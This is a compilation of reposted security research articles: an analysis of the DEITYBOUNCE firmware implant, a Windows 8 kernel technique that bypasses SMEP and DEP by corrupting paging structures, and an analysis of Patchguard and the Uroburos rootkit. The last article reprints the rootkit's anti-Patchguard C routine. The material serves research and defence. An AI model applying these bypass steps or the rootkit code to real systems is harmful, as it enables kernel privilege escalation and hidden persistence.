In this stage, DEITYBOUNCE installs additional malicious SMI handlers in the system management RAM (SMRAM) range in the RAM on the motherboard. The assumption here is that the SMRAM range is not yet locked by the motherboard BIOS; therefore, the SMRAM range is still writeable. SMRAM is a range in system memory (RAM) that is used specifically for SMM code and data. The contents of SMRAM are only accessible through SMI after it has been locked. On most Intel northbridge chipsets and recent CPUs, SMRAM is controlled by the register that controls the TSEG memory region. Usually, the register is called TSEG_BASE in Intel chipset documentation. Stage 2: Interrupt 13h execution during bootstrap (interrupt 19h). The interrupt 13h handler in the PERC RAID controller PCI expansion ROM is "patched" with malicious code to serve the interrupt 19h invocation (bootstrap). Interrupt 19h copies the bootloader to RAM by calling interrupt 13h function 02h (read sectors from drive) and then jumps into it. DEITYBOUNCE doesn't compromise the bootloader. However, DEITYBOUNCE compromises the interrupt 13h handler. The "patched" interrupt 13h handler will modify the loaded OS kernel in RAM. Figure 2 shows stage 1 of DEITYBOUNCE execution and Figure 3 shows stage 2 of DEITYBOUNCE execution. Figure 2 DEITYBOUNCE Execution Stage 1 DEITYBOUNCE stage 1 execution, shown in Figure 2, happens during the PCI expansion ROM initialization stage at POST. If you're not familiar with the detailed steps carried out by the BIOS to initialize an x86/x64 system, a.k.a. the power-on self-test, please read my system address map initialization on x86/x64 Part 1 article at System Address Map Initialization in x86/x64 Architecture Part 1: PCI-Based Systems - InfoSec Institute. We know from the Malicious Code Execution in PCI Expansion ROM article (Malicious Code Execution in PCI Expansion ROM - InfoSec Institute) that PCI expansion ROM initialization is initiated by the motherboard BIOS. 
The motherboard BIOS calls the INIT function (offset 03h from the start of the PCI expansion ROM) with a far call to start add-on board initialization by the PCI expansion ROM. This event is stage 1 of DEITYBOUNCE execution. In the DEITYBOUNCE case, the add-on board is the PERC PCI/PCIe board or the PERC chip integrated with the PowerEdge motherboard. Figure 2 illustrates the following execution steps: The PERC RAID PCI expansion ROM executes from its INIT entry point. The infected ROM code reads the DEITYBOUNCE configuration data from the RAID controller NVRAM. The infected ROM code copies DEITYBOUNCE's additional SMI handlers to the SMRAM range in the motherboard main memory (system RAM). The infected ROM code fixes the checksums of the contents of SMRAM as needed. Once the steps above are finished, the SMRAM contains all of DEITYBOUNCE's SMI handlers. Figure 2 shows that the SMRAM contains "embedded" DEITYBOUNCE SMI handlers that are already present in SMRAM before the DEITYBOUNCE component in the RAID controller PCI expansion ROM is copied into SMRAM. The embedded DEITYBOUNCE component is injected into the motherboard BIOS. That's why it's already present in SMRAM early on. Figure 2 shows the DEITYBOUNCE configuration data stored in the PERC add-on board NVRAM. This is an elegant and stealthy way of storing configuration data. How many anti-malware tools scan add-on board NVRAM? I've never heard of any. Figure 3 DEITYBOUNCE Execution Stage 2 Now, let's move to stage 2 of DEITYBOUNCE execution. There are several steps in this execution stage, as follows: The mainboard BIOS executes the PERC RAID controller PCI expansion ROM routine at bootstrap via interrupt 19h (bootstrap). This time the entry point of the PCI expansion ROM is its BCV, not the INIT function. Interrupt 19h invokes interrupt 13h function 02h to read the first sector of the boot device (in this case the HDD controlled by the RAID controller) into RAM and then jumps into it to start the bootloader. 
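A tainted disk service of the kind hypothesized here can be modeled in a few lines: run the genuine read, then edit the bytes it just loaded before anything else sees them. Everything in this sketch (the buffer contents, the patch) is invented for illustration; the real handler would patch the in-RAM OS kernel via an SMI call rather than stamp a marker:

```python
DISK_READ = 0x02  # int 13h function 02h: read sectors from drive

def hooked_int13(function, buffer, original_handler, patch):
    """Toy model of a tainted int 13h handler: preserve the original
    handler's logic, then tamper with freshly loaded data on reads."""
    original_handler(function, buffer)  # genuine disk service
    if function == DISK_READ:
        patch(buffer)                   # modify the loaded bytes in place
    return buffer

def fake_disk_read(function, buffer):
    buffer[:] = b"KERNEL_OK_______"     # pretend sector contents

def evil_patch(buffer):
    buffer[0:6] = b"EVILKN"             # stand-in for kernel patching

buf = bytearray(16)
hooked_int13(DISK_READ, buf, fake_disk_read, evil_patch)
```

The caller (the bootloader or OS loader) only ever sees the post-patch buffer, which is why nothing on disk needs to change.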
The infected PCI expansion ROM routine contains a custom interrupt 13h handler. This custom interrupt handler executes when interrupt 13h is called by the bootloader and parts of the OS initialization code. The custom routines contain the original interrupt 13h handler logic, but add routines to infect the kernel of the OS being loaded. Interrupt 13h provides services to read/write/query the storage device. Therefore, a malicious coder can modify the contents of the interrupt 13h handler routine to tamper with the content being loaded into RAM. Figure 3 shows that the custom interrupt 13h handler contains a routine to call the DEITYBOUNCE SMI handler via software SMI. The DEITYBOUNCE SMI handler contains a routine to install malware or to activate certain vulnerabilities in the target OS kernel while the OS is still in the initialization phase. Execution of the custom interrupt 13h handler depends on the DEITYBOUNCE configuration data. Figure 3 shows that the DEITYBOUNCE configuration data related to the custom interrupt 13h handler is stored in the PERC RAID controller NVRAM. The target OS contains a vulnerability or malware after steps 1 and 2 of DEITYBOUNCE's second-stage execution. Keep in mind that the vulnerability or malware only exists in RAM, because the instance of the OS that's modified by DEITYBOUNCE exists in RAM, not on a permanent storage device (HDD or SSD). At this point we know how DEITYBOUNCE might work in sufficient detail. However, you should be aware that this is only the result of my preliminary assessment of DEITYBOUNCE. Therefore, it's bound to have inaccuracies. Closing Thoughts: Hypotheses on DEITYBOUNCE Technical Purpose There are two undeniable strategic values possessed by DEITYBOUNCE compared to "ordinary" malware: DEITYBOUNCE provides a stealthy way to alter the loaded OS without leaving a trace on the storage device, i.e., HDD or SSD, in order to avoid being detected via "ordinary" computer forensic procedures. Why? 
Because the OS is manipulated when it’s loaded to RAM, the OS installation on the storage device itself is left untouched (genuine). SMM code execution provides a way to conceal the code execution from possible OS integrity checks by other-party scanners. In this respect, we can view DEITYBOUNCE as a very sophisticated malware dropper. DEITYBOUNCE provides a way to preserve the presence of the malware in the target system because it is persistent against OS reinstallation. Given the capabilities provided by DEITYBOUNCE, there could possibly be a stealthy Windows rootkit that communicates with DEITYBOUNCE via software SMI to call the DEITYBOUNCE SMI handler routine at runtime from within Windows. The purpose of such a rootkit is unclear at this point. Whether the required SMI handler is implemented by DEITYBOUNCE is unknown at the moment. By Darmawan Salihun|January 29th, 2014 Sursa: NSA BIOS Backdoor a.k.a. God Mode Malware Part 1: DEITYBOUNCE - InfoSec Institute
  8. Windows 8 Kernel Memory Protections Bypass Recently, MWR intern Jérémy Fetiveau (@__x86) conducted a research project into the kernel protections introduced in Microsoft Windows 8 and newer. This blog post details his findings, and presents a generic technique for exploiting kernel vulnerabilities, bypassing SMEP and DEP. Proof-of-concept code is provided which reliably gains SYSTEM privileges, and requires only a single vulnerability that provides an attacker with a write-what-where primitive. We demonstrate this issue by providing a custom kernel driver, which simulates the presence of such a kernel vulnerability. Introduction Before diving into the details of the bypass technique, we will quickly run through some of the technologies we will be breaking, and what they do. If you want to grab the code and follow along as we go, you can get the zip of the files here. SMEP SMEP (Supervisor Mode Execution Prevention) is a mitigation that aims to prevent the CPU from running code from user-mode while in kernel-mode. SMEP is implemented at the page level, and works by setting flags on a page table entry, marking it as either U (user) or S (supervisor). When accessing this page of memory, the MMU can check this flag to make sure the memory is suitable for use in the current CPU mode. DEP DEP (Data Execution Prevention) operates much the same as it does in user-mode, and is also implemented at the page level by setting flags on a page table entry. The basic principle of DEP is that no page of memory should be both writeable and executable, which aims to prevent the CPU executing instructions provided as data from the user. KASLR KASLR (Kernel Address Space Layout Randomization) is a mitigation that aims to prevent an attacker from successfully predicting the address of a given piece of memory. This is significant, as many exploitation techniques rely on an attacker being able to locate the addresses of important data such as shellcode, function pointers, etc. 
Paging 101 With the use of virtual memory, the CPU needs a way to translate virtual addresses to physical addresses. There are several paging structures involved in this process. Let's first consider a toy example where we only have page tables in order to perform the translation. For each running process, the processor will use a different page table. Each entry of this page table will contain the information "virtual page X references physical frame Y". Of course, these frames are unique, whereas pages are relative to their page table. Thus we can have a process A with a page table PA containing an entry "page 42 references frame 13" and a process B with a page table PB containing an entry "page 42 references frame 37". If we consider a format for virtual addresses that consists of a page table field followed by an offset referencing a byte within this page, the same address (page 42, offset 10) would correspond to two different physical locations according to which process is currently running (and which page table is currently active). For a 64-bit x86_64 processor, the virtual address translation is roughly the same. However, in practice the processor is not using only page tables, but four different structures. In the previous example, we had physical frames referenced by PTEs (page table entries) within PTs (page tables). In reality, the actual format for virtual addresses looks more like the illustration below: The cr3 register contains the physical address of the PML4. The PML4 field of a virtual address is used to select an entry within this PML4. The selected PML4 entry contains (with a few additional flags) the physical address of a PDPT (Page Directory Pointer Table). The PDPT field of a virtual address therefore references an entry within this PDPT. As expected, this PDPT entry contains the physical address of a PD. 
We can therefore use the PD field of the virtual address to reference an entry within the PD, and so on and so forth. This is well summarized by Intel's schema: It should now be clearer how the hardware actually translates virtual addresses to physical addresses. An interested reader who is not familiar with the inner workings of x64 paging can refer to section 4.5 of volume 3A of the Intel manuals for more in-depth explanations. Previous Exploitation Techniques In the past, kernel exploits commonly redirected execution to memory allocated in user-land. Due to the presence of SMEP, this is no longer possible. Therefore, an attacker would have to inject code into the kernel memory, or convince the kernel to allocate memory with attacker-controlled content. This was commonly achieved by allocating executable kernel objects containing attacker-controlled data. However, due to DEP, most objects are now non-executable (for example, the "NonPagedPoolNx" pool type has replaced "NonPagedPool"). An attacker would now have to find a way to use a kernel payload based on return-oriented programming (ROP), which reuses existing executable kernel code. In order to construct such a payload, an attacker would need to know the location of certain "ROP gadgets", which contain the instructions that will be executed. However, due to the presence of KASLR, these gadgets will be at different addresses on each run of the system, so locating these gadgets would likely require additional vulnerabilities. Technique Overview The presented technique consists of writing a function to deduce the address of paging structures from a given user-land memory address. Once these structures are located, we are able to partially corrupt them to change the metadata, allowing us to "trick" the kernel into thinking a chunk that was originally allocated in user-mode is suitable for use in kernel-mode. 
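Deducing those addresses starts from how a virtual address decomposes. The 4-level split described in Paging 101 is a few lines of bit arithmetic: each 9-bit field selects one of 512 entries at its level, and the low 12 bits are the byte offset within the 4KB page (the sample address is arbitrary):

```python
def split_va(va):
    """Split a 48-bit canonical virtual address into its x86_64
    4-level paging indices and page offset."""
    return {
        "pml4":   (va >> 39) & 0x1FF,  # entry within the PML4
        "pdpt":   (va >> 30) & 0x1FF,  # entry within the PDPT
        "pd":     (va >> 21) & 0x1FF,  # entry within the PD
        "pt":     (va >> 12) & 0x1FF,  # entry within the PT (the PTE)
        "offset": va & 0xFFF,          # byte within the 4KB page
    }

fields = split_va(0x7FFE12345678)
```

Reassembling the five fields with the inverse shifts reproduces the original address, which is a handy sanity check when experimenting with the technique.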
We can also corrupt the flags checked by DEP to make the contents of the memory executable. By doing this in a controlled manner, we can create a piece of memory that was initially allocated as non-executable by a user-mode process, and modify the relevant paging structures so that it can be executed as kernel-mode code. We will describe this technique in more detail below. Retrieving the Addresses of Paging Structures When the kernel wants to access paging structures, it has to find their virtual addresses. The processor instructions only allow the manipulation of virtual addresses, not physical ones. Therefore, the kernel needs a way to map those paging structures into virtual memory. For that, several operating systems use a special self-referencing PML4 entry. Instead of referencing a PDPT, this PML4 entry will reference the PML4 itself, and shift the other values to make space for the new self-reference field. Thus, instead of referencing a specific byte of memory within a memory page, a PTE will be referenced. It is possible to retrieve more structures by using the same self-reference entry several times. A good description of this mechanism can also be found in the excellent book What makes it page? The Windows 7 (x64) virtual memory manager by Enrico Martignetti. A Step-By-Step Example To better understand this process, let's go through an example showing how to build a function that maps a virtual address to the address of its PTE. First, we should remind ourselves of the usual format of a virtual address. A canonical address has its 48 bits composed of four 9-bit fields and one 12-bit offset field. The PML4 field references an entry within the PML4, the PDPT field references an entry within the PDPT, and so on and so forth. If we want to reference a PTE instead of a byte located within a page, we can use the special PML4 entry 0b111101101 (0x1ED). 
We fill the PML4 field with this special entry and then shift everything 9 bits to the right so that we get an address with the following format: We use this technique to build a function which maps the address of a byte of memory to the address of its PTE. If you are following along in the code, this is implemented in the function "getPTfromVA" in the file "computation.cpp". It should be noted that, even though the last offset field is 12 bits, we still do a 9-bit shift and set the remaining bits to 0 so that we have an aligned address. To get the other structures, we can simply apply the same technique several times. Here is an example for the PDE addresses: Modifying Paging Structures We use the term PXE as a generic term for paging structure entries, as many of them share the same layout, which is as follows: There are a number of fields that are interesting here, especially the NX bit field, which defines how the memory can be accessed, and the flags at the end, which include the U/S flag. This U/S flag denotes whether the memory is for use in user-mode or supervisor-mode (kernel-mode). When checking the rights of a page, the kernel will check every PXE involved in the address translation. That means that if we want to check whether the U/S flag is set, we will check all entries relating to that page. If any of the entries do not have the supervisor flag set, any attempt to use this page from kernel mode will trigger a fault. If all of the entries have the supervisor flag set, the page will be considered a kernel-mode page. Because DEP is set at the page granularity level, typically the higher-level paging structures will be marked as executable, with DEP being applied at the PTE level by setting the NX bit. Because of this, rather than starting by allocating kernel memory, it is easier to allocate user memory with executable rights using the standard API, and then corrupt the paging structures to modify the U/S flag and cause it to be interpreted as kernel memory. 
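A sketch of the arithmetic a `getPTfromVA`-style function performs, assuming the self-referencing slot 0b111101101 (0x1ED) mentioned above; the exact implementation in "computation.cpp" may differ, but the described steps (shift right 9 bits, force the PML4 field to the self-reference, 8-byte-align, make the result canonical) are reproduced here:

```python
SELF_REF = 0b111101101  # 0x1ED, the self-referencing PML4 slot

def canonical(addr):
    """Sign-extend a 48-bit address (copy bit 47 into bits 48-63)."""
    return addr | 0xFFFF000000000000 if addr & (1 << 47) else addr

def pte_address(va):
    """Virtual address of the PTE mapping `va`: the self-reference
    consumes one translation level, so the final 'page' the address
    reaches is the page table itself, and (va >> 12) * 8 indexes
    the 8-byte PTE within it."""
    return canonical((SELF_REF << 39) | (((va >> 12) & 0xFFFFFFFFF) << 3))

pte = pte_address(0x100804020001)
```

With this slot, `pte_address(0)` evaluates to 0xFFFFF68000000000, the well-known base of the Windows PTE region, which is a quick way to convince yourself the shifts are right.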
Using Isolated PXEs If we corrupt a random PXE, we are likely to be in a case where the target PXE is part of a series of PXEs that are contiguous in memory. In these cases, during exploitation an attacker might corrupt adjacent PXEs, which has a high risk of causing a crash. Most of the time, the attacker can't simply modify only 1 bit in memory, but has to corrupt several bytes (8 bytes in our POC), which forces the attacker to corrupt more than just the relevant flags for the exploit. The easiest way to circumvent this issue is simply to target a PXE which is isolated (e.g., with unused PXE structures on either side of the target PXE). In 64-bit environments, a process has access to a huge virtual address space of 256TB, as we are effectively using 48-bit canonical addresses instead of the full 64-bit address space. A 48-bit virtual address is composed of several fields allowing it to reference different paging structures. As the PML4 field is 9 bits, it refers to one of 512 (2**9) PML4 entries. Each PML4 entry describes a range of 512GB (2**39 bytes). Obviously, a user process will not use so much memory that it uses all of the PML4 entries. Therefore, we can request the allocation of memory at an address outside of any used 512GB range. This will force the use of a new PML4 entry, which will reference structures containing only a single PDPT entry, a single PDE, and a single PTE. An interested reader can verify this idea using the "!address" and "!pte" windbg extensions to observe those "holes" in memory. In the presented POC, the 0x100804020001 address is used, as it is very likely to be in an unused area. Practical Attack The code for the mitigation bypass is very simple. Suppose that we've got a vulnerable kernel component for which we are able to exploit a vulnerability which gives us a write-what-where primitive from a user-land process (this is implemented within the "write_what_where" function in our POC). 
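Two quick computations illustrate the choices just described (the sample PTE value is invented). First, the POC address 0x100804020001 lands on entry 32 at every paging level, so each of its PXEs sits in a freshly allocated, otherwise empty table with unused neighbours. Second, the corrupting write itself only needs to clear the U/S bit (bit 2) and the NX bit (bit 63) of each PXE:

```python
def paging_indices(va):
    """PML4/PDPT/PD/PT indices of a 48-bit virtual address."""
    return [(va >> shift) & 0x1FF for shift in (39, 30, 21, 12)]

PXE_PRESENT = 1 << 0
PXE_USER    = 1 << 2   # U/S flag: 1 = user, 0 = supervisor
PXE_NX      = 1 << 63  # 1 = no-execute

def to_supervisor_executable(pxe):
    """The net effect of the overwrite: supervisor-mode, executable."""
    return pxe & ~(PXE_USER | PXE_NX)

indices = paging_indices(0x100804020001)

# A plausible user-mode, non-executable PTE (frame 0x1234 is made up).
pte = (0x1234 << 12) | PXE_PRESENT | (1 << 1) | PXE_USER | PXE_NX
pte = to_supervisor_executable(pte)
```

The frame number and the other flag bits survive the edit, which is why the corrupted entries keep translating to the attacker's shellcode page.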
We choose a virtual address with isolated paging structures (such as 0x100804020001), allocate it, and fill it with our shellcode. We then retrieve all of its paging structures using the mapping function described earlier in this post (using the field shifting and the self-referencing PML4). Finally, we perform unaligned overwrites of the 4 PXEs relating to our chosen virtual address to modify its U/S bit to supervisor. Of course, other slightly different scenarios for exploitation could be considered. For instance, if we can decrement or increment an arbitrary value in memory, we could just flip the desired flags. Also, since we are using isolated paging structures, even in the case of a bug leading to the corruption of a lot of adjacent data, the technique can still be used, because it is unlikely that any important structures are located in the adjacent memory. With this blog post, we provide an exploit for a custom driver with a very simple write-what-where vulnerability so as to let the reader experiment with the technique. However, this document was originally submitted to Microsoft with a real-world use-after-free vulnerability. Indeed, in a lot of cases, it would be possible for an attacker to force a write-what-where primitive from a vulnerability such as a use-after-free or a pool overflow. Mitigating the Attack This technique is not affected by KASLR because it is possible to directly derive the addresses of paging structures from a given virtual address. If randomization was introduced into this mapping, this would no longer be possible, and this technique would be mitigated as a result. Randomizing this function would require having a different self-referencing PML4 entry each time the kernel boots. However, it is recognised that many of the core functions of the kernel memory management may rely on this mapping to locate and update paging structures. 
It might also be possible to move the paging structures into a separate segment, and reference these structures using an offset into that segment. If we consider the typical write-what-where scenarios, unless the address specified already had a segment prefix, it would not be possible for an attacker to overwrite the paging structures, even if the offset within the segment was known.

If this is not possible, another approach might be to use a hardware debug register as a faux locking mechanism. For example, if a hardware breakpoint was set on access to the paging structures (or key fields of the structures), a handler for that breakpoint could test the value of the debug register to assess whether the access is legitimate or not. Before a legitimate modification to the paging structures, the kernel would unset the debug register, and no exception would be thrown. If an attacker attempted to modify the memory without unsetting the debug register, an exception could be thrown to detect this.

Vendor Response

We reported this issue to Microsoft as part of their Mitigation Bypass Bounty Program. However, they indicated that it did not meet all of their program guidelines, as it cannot be used to remotely exploit user-mode vulnerabilities. In addition, Microsoft stated that their security engineering team was aware of this “limitation”, that they did not consider it a security vulnerability, and that a fix was not currently planned.

With this in mind, we have decided to release this post and the accompanying code to provide a public example of current Windows kernel research. However, we have chosen not to release the fully weaponised exploit we developed as part of the submission to Microsoft, as it makes use of a vulnerability that has only recently been patched.

Conclusion

The technique proposed in this post allows an attacker to reliably bypass both DEP and SMEP in a generic way. 
We showed that it is possible to derive the addresses of paging structures from a virtual address, and how an attacker could use this to corrupt paging structures so as to create executable kernel memory, even at low memory addresses. We demonstrated that this technique is usable without fear of corrupting non-targeted PXEs, even if the attacker has to corrupt large quantities of memory. Furthermore, we showed that this technique is not specific to bugs that provide a write-what-where primitive, but can also be used for a broad range of bug classes.

Sursa: https://labs.mwrinfosecurity.com/blog/2014/08/15/windows-8-kernel-memory-protections-bypass/
  9. The Windows 8.1 Kernel Patch Protection

In the last 3 months we have seen a lot of machines compromised by Uroburos (a kernel-mode rootkit that spreads in the wild and specifically targets Windows 7 64-bit). Curiosity led me to start analyzing the code for Kernel Patch Protection on Windows 8.1. We will take a glance at its current implementation on that operating system and find out why the Kernel Patch Protection modifications made by Uroburos on Windows 7 don’t work on the Windows 8.1 kernel.

In this blog post, we will refer to the technology known as “Kernel Patch Protection” as “Patchguard”. Specifically, we will call the Kernel Patch Protection on Windows 7 “Patchguard v7”, and the more recent Windows 8.1 version “Patchguard v8”. The implementation of Patchguard has slightly changed between versions of Windows. I would like to point out the following articles that explain the internal architecture of older versions of Patchguard:

- Skape, Bypassing PatchGuard on Windows x64, Uninformed, December 2005
- Skywing, PatchGuard Reloaded - A Brief Analysis of PatchGuard Version 3, Uninformed, September 2007
- Christoph Husse, Bypassing PatchGuard 3 - CodeProject, August 2008

Kernel Patch Protection - Old version attack methods

We have seen some attacks targeting older versions of the Kernel Patch Protection technology. Some of those (see Fyyre’s website for examples) disarm Patchguard by preventing its initialization code from being called. Patchguard is indeed initialized at Windows startup time, when the user switches on the workstation. To do this, various technologies have been used: the MBR Bootkit (PDF, in Italian), VBR Bootkit, and even a brand-new UEFI Bootkit. These kinds of attacks are quite easy to implement, but they have a big drawback: they all require the victim's machine to be rebooted, and they are impossible to exploit if the target system implements some kind of boot manager digital signature protection (like Secure Boot). 
Other techniques relied on different tricks to evade Patchguard or to totally block it. These techniques involve:

- x64 debug registers (DR registers) - Place a managed hardware breakpoint on every read-access to the modified code region. This way the attacker can restore the modification and then continue execution.

- Exception handler hooking - Patchguard’s validation routine (the procedure that calls and raises the Kernel Patch Protection checks) is executed through exception handlers that are raised by certain Deferred Procedure Call (DPC) routines; this feature gives attackers an easy way to disable Patchguard.

- Hooking KeBugCheckEx and/or other kernel key functions - System compromises are reported through the KeBugCheckEx routine (BugCheck code 0x109); this is an exported function. Patchguard clears the stack so there is no return point once one enters KeBugCheckEx, though there is a catch: one can easily resume the thread using the standard “thread startup” function of the kernel.

- Patching the kernel timer DPC dispatcher - Another attack cited by Skywing (see references above). By design, Patchguard’s validation routine relies on the dispatcher of the kernel timers to kick in and dispatch the deferred procedure call (DPC) associated with the timer. Thus, an obvious target for attackers is to patch the kernel timer’s DPC dispatcher code to call their own code. This attack method is easy to implement.

- Patchguard code direct modification - An attack method described in a paper by McAfee. They located the encrypted Patchguard code directly in the kernel heap, then manually decrypted it and modified its entry point (the decryption code). The Patchguard code was finally manually re-encrypted.

The techniques described above are quite ingenious. They disable Patchguard without rebooting the system or modifying boot code. 
It’s worth noting that the latest Patchguard implementation has rendered all these techniques obsolete, as it is able to completely neutralize them. Now let’s analyse how the Uroburos rootkit implements the KeBugCheckEx hooks to turn off Kernel Patch Protection on a Windows 7 SP1 64-bit system.

Uroburos rootkit - the KeBugCheckEx hook

Analysing an infected machine reveals that the Uroburos 64-bit driver doesn’t install any direct hook on the kernel crash routine named “KeBugCheckEx”. So why doesn't it make any direct modification? To answer this question, an analysis of the Patchguard v7 code is needed. Patchguard copies the code of some kernel functions into a private kernel buffer. The copied procedures are directly used by Patchguard to perform all integrity checks, including crashing the system if any modification is found. If the system has been modified, it copies the functions back to their original location and crashes the system.

The problem with the implementation of Patchguard v7 lies in the code of the procedures used by the protected routines. That code is vulnerable to direct manipulation, as there is only one copy (the original one). This is, in fact, the Uroburos strategy: KeBugCheckEx is not touched in any manner. Only a routine used directly by KeBugCheckEx is forged: RtlCaptureContext. The Uroburos rootkit installs deviations in the original Windows kernel routines by registering a custom software interrupt (0x3C). In the forged routines, the interrupt is raised using the x86 “int” opcode.

RtlCaptureContext

The related Uroburos interrupt service routine for the RtlCaptureContext routine (sub-type 1) is raised by the forged code. The software interrupt is dispatched, the original routine is called, and finally the processor context is analysed. A filter routine is called. 
It implements the following code:

    /* Patchguard Uroburos Filter routine
     * dwBugCheckCode - Bugcheck code saved on the stack by KeBugCheckEx routine
     * lpOrgRetAddr  - Original RtlCaptureContext call return address
     */
    void PatchguardFilterRoutine(DWORD dwBugCheckCode, ULONG_PTR lpOrgRetAddr)
    {
        LPBYTE pCurThread = NULL;            // Current running thread
        LPVOID lpOrgThrStartAddr = NULL;     // Original thread
        DWORD dwProcNumber = 0;              // Current processor number
        ULONG mjVer = 0, minVer = 0;         // OS Major and minor version indexes
        QWORD * qwInitialStackPtr = 0;       // Thread initial stack pointer
        KIRQL kCurIrql = KeGetCurrentIrql(); // Current processor IRQL

        // Get Os Version
        PsGetVersion(&mjVer, &minVer, NULL, NULL);

        if (lpOrgRetAddr > (ULONG_PTR)KeBugCheckEx &&
            lpOrgRetAddr < ((ULONG_PTR)KeBugCheckEx + 0x64) &&
            dwBugCheckCode == CRITICAL_STRUCTURE_CORRUPTION) {
            // This is the KeBugCheckEx Patchguard invocation
            // Get Initial stack pointer
            qwInitialStackPtr = (LPQWORD)IoGetInitialStack();

            if (g_lpDbgPrintAddr) {
                // DbgPrint is forged with a single "RETN" opcode, restore it
                DisableCR0WriteProtection();
                // ... restore original code ...
                RestoreCR0WriteProtection(); // Revert CR0 memory protection
            }

            pCurThread = (LPBYTE)KeGetCurrentThread();
            // Get original thread start address from ETHREAD
            lpOrgThrStartAddr = *((LPVOID*)(pCurThread + g_dwThrStartAddrOffset));
            dwProcNumber = KeGetCurrentProcessorNumber();

            // Initialize and queue Anti Patchguard Dpc
            KeInitializeDpc(&g_antiPgDpc, UroburusDpcRoutine, NULL);
            KeSetTargetProcessorDpc(&g_antiPgDpc, (CCHAR)dwProcNumber);
            KeInsertQueueDpc(&g_antiPgDpc, NULL, NULL);

            // If target Os is Windows 7
            if (mjVer >= 6 && minVer >= 1)
                // Put stack base address in first stack element
                qwInitialStackPtr[0] = ((ULONG_PTR)qwInitialStackPtr + 0x1000) & (~0xFFF);

            if (kCurIrql > PASSIVE_LEVEL) {
                // Restore original DPC context ("KiRetireDpcList" Uroburos interrupt
                // plays a key role here). This call doesn't return
                RestoreDpcContext(); // The faked DPC will be processed
            } else {
                // Jump directly to original thread start address (ExpWorkerThread)
                JumpToThreadStartAddress((LPVOID)qwInitialStackPtr, lpOrgThrStartAddr, NULL);
            }
        }
    }

As the reader can see, the code is quite straightforward. First it analyses the original context: if the return address lies in the prologue of the kernel routine KeBugCheckEx and the bugcheck code equals CRITICAL_STRUCTURE_CORRUPTION, then Uroburos has intercepted a Patchguard crash request. The initial thread start address and stack pointer are obtained from the ETHREAD structure and a faked DPC is queued:

    // NULL Uroburos Anti-Patchguard DPC
    void UroburusDpcRoutine(struct _KDPC *Dpc, PVOID DeferredContext,
                            PVOID SystemArgument1, PVOID SystemArgument2)
    {
        return;
    }

Code execution is resumed in one of two different places based on the current Interrupt Request Level (IRQL). If the IRQL is at PASSIVE_LEVEL, then a standard JMP opcode is used to return to the original start address of the thread from which the Patchguard check originated (in this case, a worker thread created by the “ExpWorkerThread” routine). If the IRQL is at DISPATCH_LEVEL or above, Uroburos will exploit the previously acquired processor context using the KiRetireDpcList hook. Uroburos will then restart code execution at the place where the original call to KiRetireDpcList was made, remaining at the high IRQL level. The faked DPC is needed to prevent a crash of the restored thread.

KiRetireDpcList and RtlLookupFunctionEntry

As shown above, the KiRetireDpcList hook is needed to restore the thread context in case of a high IRQL. This hook saves the processor context before the original call is made and then transfers execution back to the original KiRetireDpcList Windows code. Publicly available literature about Uroburos claims that the RtlLookupFunctionEntry hook is related to the Anti-Patchguard feature. This is wrong. 
Our analysis has pinpointed that this hook is there only to hide and protect the Uroburos driver’s RUNTIME_FUNCTION array (see my previous article about Windows 8.1 Structured Exception Handling).

Conclusion

The Uroburos anti-Patchguard feature code is quite simple but very effective. This method is practically able to disarm all older versions of the Windows Kernel Patch Protection without any issues or system crashes.

Patchguard v8 - Internal architecture

STARTUP

The Windows Nt kernel startup is accomplished in 2 phases. The Windows Internals book describes the nitty-gritty details of both phases. Phase 0 builds the rudimentary kernel data structures required to allow the services needed in phase 1 to be invoked (page tables, per-processor Processor Control Blocks (PRCBs), internal lists, resources and so on). At the end of phase 0, the internal routine InitBootProcessor uses a large call stack that ends right at the Phase1InitializationDiscard function. This function, as the name implies, discards the code that is part of the INIT section of the kernel image in order to preserve memory. Inside it, there is a call to the KeInitAmd64SpecificState routine. 
Analysing it reveals that the code is not related to its name:

    int KeInitAmd64SpecificState()
    {
        DWORD dbgMask = 0;
        int dividend = 0, result = 0;
        int value = 0;

        // Exit in case the system is booted in safe mode
        if (InitSafeBootMode)
            return 0;

        // KdDebuggerNotPresent: 1 - no debugger; 0 - a debugger is attached
        dbgMask = KdDebuggerNotPresent;
        // KdPitchDebugger: 1 - debugger disabled; 0 - a debugger could be attached
        dbgMask |= KdPitchDebugger;

        if (dbgMask)
            dividend = -1;   // Debugger completely disabled
        else
            dividend = 0x11; // Debugger might be enabled

        value = (int)_rotr(dbgMask, 1); // "value" is equal to 0 if debugger is enabled,
                                        // 0x80000000 if debugger is NOT enabled

        // Perform a signed division between two 32 bit integers:
        result = (int)(value / dividend); // IDIV value, dividend
        return result;
    }

The routine’s code ends with a signed division: if a debugger is present the division evaluates to 0 (0 divided by 0x11 is 0); otherwise a strange thing happens: 0x80000000 divided by 0xFFFFFFFF raises an overflow exception. To understand why, let’s simplify everything and perform, as an example, an 8-bit signed division: -128 divided by -1. The result should be +128. Here is the assembly code:

    mov cl, FFh
    mov ax, FF80h
    idiv cl

The last instruction clearly raises an exception because the value +128 doesn’t fit in the destination 8-bit register AL (remember that we are speaking about signed integers). Following the SEH structures inside the Nt kernel file leads code execution to the “KiFilterFiberContext” routine. This is another procedure with a misleading name: all it does is disable a potential debugger and prepare the context for the Patchguard initialization routine. The initialization routine of the Kernel Patch Protection technology is a huge function (95 KB of pure machine code) inside the INIT section of the Nt kernel binary file. From now on, we will call it “KiInitializePatchguard”. 
INTERNAL ARCHITECTURE, A QUICK GLANCE

The initialization routine builds all the internal Patchguard key data structures and copies all its routines many times. The code for KiInitializePatchguard is very hard to follow and understand because it contains obfuscation, useless opcodes, and repeated chunks. Furthermore, it contains a lot of checks for the presence of a debugger. After some internal environment checks, it builds a huge buffer in the kernel nonpaged pool that contains all the data needed by Patchguard. This buffer is surrounded by a random number of 8-byte QWORD seed values, repeatedly calculated with the “RDTSC” opcode.

Image: https://lh4.googleusercontent.com/oym_O5vcYyOXAlauXqrwRVVEt2rkj27OED4AwT90LsveJ6KfUbfFqh_lx-ZJxEasIVx_aTU6Fqdreh5pNm55yK5vPcS7xPM0TZ5VpWrotqJUjRsBEE9ax06G-N5_oa3aBA

As the reader can see from the above picture, the Patchguard buffer contains a lot of useful info. All the needed data is organized in 3 main sections:

Internal configuration data

